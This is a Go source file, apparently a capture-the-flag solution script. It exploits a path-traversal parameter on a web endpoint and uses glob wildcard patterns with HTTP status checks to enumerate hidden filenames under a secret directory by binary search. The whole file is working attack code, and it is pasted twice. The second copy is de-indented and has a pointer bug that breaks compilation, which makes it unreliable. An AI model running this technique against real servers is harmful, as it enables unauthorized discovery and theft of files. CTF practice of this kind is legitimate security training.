Acebond/glob_search.go

## glob_search.go
package main

import (
	"fmt"
	"log"
	"net/http"
	"os"
	"strings"
	//    "net/url"
)

var (
	target = "ctf.shellz.club:8081"
	path   = "/file"
	// /var/apache2/cgi-bin/
	query         = "name=../../.././../../../../../../INJECTION"
	searchFolder  = "/home/ctf/secret/"
	searchSpace   = "AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz.123456789%20_"
	maxFileLength = 30
	//errorResponse = []byte("That log file doesn't exist")
)

func formatURL(injection string) string {
	URL := "http://" + target + path + "?" + query
	URL = strings.Replace(URL, "INJECTION", searchFolder+injection, 1)
	return URL
}

func isValidFile(filename string) bool {
	URL := formatURL(filename)
	resp, err := http.Get(URL)

	if err != nil {
		log.Panicln(err.Error())
	}

	//defer resp.Body.Close()
	//respBody, _ := ioutil.ReadAll(resp.Body)
	return resp.StatusCode == http.StatusOK
	//return !bytes.Contains(respBody, errorResponse)
}

func binarySearchLetters(currentFilename string, searchSpace string, length int, results *[]string) {

	if len(searchSpace) == 1 {
		*results = append(*results, searchSpace)
		return
	}

	split := len(searchSpace) / 2
	pattern := ""
	pattern = fmt.Sprintf("%s[%s]%s", currentFilename, searchSpace[:split], strings.Repeat("?", length-len(currentFilename)-1))

	if isValidFile(pattern) {
		binarySearchLetters(currentFilename, searchSpace[:split], length, results)
	}

	pattern = fmt.Sprintf("%s[%s]%s", currentFilename, searchSpace[split:], strings.Repeat("?", length-len(currentFilename)-1))
	if isValidFile(pattern) {
		binarySearchLetters(currentFilename, searchSpace[split:], length, results)
	}

}

func findValidFiles(length int) []string {

	log.Printf("Finding filenames with length: %d\n", length)

	fileNames := []string{""}
	tmpNames := []string{}

	for i := 1; i <= length; i++ {
		log.Println(fileNames)

		for _, parshallName := range fileNames {
			solutions := []string{}
			binarySearchLetters(parshallName, searchSpace, length, &solutions)
			//log.Printf("Solutions: %v\n", solutions)
			for _, char := range solutions {
				//fmt.Printf("Appending %s to tmpNames\n", parshallName + char)
				tmpNames = append(tmpNames, parshallName+char)
			}
		}
		fileNames = nil
		fileNames = append(fileNames, tmpNames...)
		tmpNames = nil
	}

	return fileNames

}

func findFiles() {
	for len := 10; len < maxFileLength; len++ {
		pattern := strings.Repeat("?", len)

		if isValidFile(pattern) {
			for _, filename := range findValidFiles(len) {
				log.Printf("Found File: %s\n", filename)
			}
		}
	}
}

func main() {
	//flag.StringVar(&searchFolder, "path", "/var/apache2/html", "path to search")
	//flag.Parse()
	os.Setenv("HTTP_PROXY", "http://127.0.0.1:8080")
	findFiles()
}
	package main

	import (
	"fmt"
	"log"
	"net/http"
	"os"
	"strings"
	// "net/url"
	)

	var (
	target = "ctf.shellz.club:8081"
	path = "/file"
	// /var/apache2/cgi-bin/
	query = "name=../../.././../../../../../../INJECTION"
	searchFolder = "/home/ctf/secret/"
	searchSpace = "AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz.123456789%20_"
	maxFileLength = 30
	//errorResponse = []byte("That log file doesn't exist")
	)

	func formatURL(injection string) string {
	URL := "http://" + target + path + "?" + query
	URL = strings.Replace(URL, "INJECTION", searchFolder+injection, 1)
	return URL
	}

	func isValidFile(filename string) bool {
	URL := formatURL(filename)
	resp, err := http.Get(URL)

	if err != nil {
	log.Panicln(err.Error())
	}

	//defer resp.Body.Close()
	//respBody, _ := ioutil.ReadAll(resp.Body)
	return resp.StatusCode == http.StatusOK
	//return !bytes.Contains(respBody, errorResponse)
	}

	func binarySearchLetters(currentFilename string, searchSpace string, length int, results *[]string) {

	if len(searchSpace) == 1 {
	results = append(results, searchSpace)
	return
	}

	split := len(searchSpace) / 2
	pattern := ""
	pattern = fmt.Sprintf("%s[%s]%s", currentFilename, searchSpace[:split], strings.Repeat("?", length-len(currentFilename)-1))

	if isValidFile(pattern) {
	binarySearchLetters(currentFilename, searchSpace[:split], length, results)
	}

	pattern = fmt.Sprintf("%s[%s]%s", currentFilename, searchSpace[split:], strings.Repeat("?", length-len(currentFilename)-1))
	if isValidFile(pattern) {
	binarySearchLetters(currentFilename, searchSpace[split:], length, results)
	}

	}

	func findValidFiles(length int) []string {

	log.Printf("Finding filenames with length: %d\n", length)

	fileNames := []string{""}
	tmpNames := []string{}

	for i := 1; i <= length; i++ {
	log.Println(fileNames)

	for _, parshallName := range fileNames {
	solutions := []string{}
	binarySearchLetters(parshallName, searchSpace, length, &solutions)
	//log.Printf("Solutions: %v\n", solutions)
	for _, char := range solutions {
	//fmt.Printf("Appending %s to tmpNames\n", parshallName + char)
	tmpNames = append(tmpNames, parshallName+char)
	}
	}
	fileNames = nil
	fileNames = append(fileNames, tmpNames...)
	tmpNames = nil
	}

	return fileNames

	}

	func findFiles() {
	for len := 10; len < maxFileLength; len++ {
	pattern := strings.Repeat("?", len)

	if isValidFile(pattern) {
	for _, filename := range findValidFiles(len) {
	log.Printf("Found File: %s\n", filename)
	}
	}
	}
	}

	func main() {
	//flag.StringVar(&searchFolder, "path", "/var/apache2/html", "path to search")
	//flag.Parse()
	os.Setenv("HTTP_PROXY", "http://127.0.0.1:8080")
	findFiles()
	}